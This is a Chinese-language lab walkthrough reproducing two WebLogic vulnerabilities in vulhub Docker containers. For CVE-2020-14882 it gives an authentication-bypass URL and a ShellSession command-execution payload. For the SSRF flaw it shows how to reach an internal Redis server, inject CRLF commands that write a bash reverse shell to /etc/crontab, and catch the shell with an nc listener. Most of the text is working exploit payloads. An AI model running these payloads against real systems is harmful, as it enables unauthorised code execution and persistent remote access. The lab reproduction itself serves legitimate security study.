weblogic管理控制台未授权远程命令执行漏洞和weblogic SSRF漏洞复现

1 weblogic管理控制台未授权远程命令执行漏洞复现

（1）cd CVE-2020-14882 切换目录。

（2）docker-compose up -d 启动。

（3）访问http://192.168.241.128:7001/console

（4）http://192.168.241.128:7001/css/%252e%252e%252fconsole.portal  绕过漏洞，未授权访问后台管理页面。

（5）burpsuite抓包。

（6）send to repeater，构造URL：

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/EDI');")

点击go。

（6）进入容器：docker exec -it 101 /bin/bash。

（7）切换目录：cd /

cd tmp

查看：ls，创建成功。

2.weblogic SSRF漏洞复现

（1）切换目录：cd vulhub  cd weblogic  cd ssrf

（2）docker-compose up -d 启动。

（3）访问：http://192.168.17.128:7001/uddiexplorer/SearchPublicRegistries.jsp

（4）burpsuite抓包。

（5）send to repeater ,这里的operator是可控的，输入127.0.0.1:7001，点击go。

（6）注入HTTP头，利用Redis反弹shell。通过SSRF探测内网中的Redis的服务器，输入： 172.18.0.2:6379。

(7)将反弹shell脚本写入/etc/crontab：

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.233.139/1234 0>&1\n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

对命令进行URL编码：

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.233.140%2F1236%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

将URL编码后的字符串放在SSRF的域名后面发送。

(8) 攻击机开启监听:nc -lvp 1236，成功反弹shell.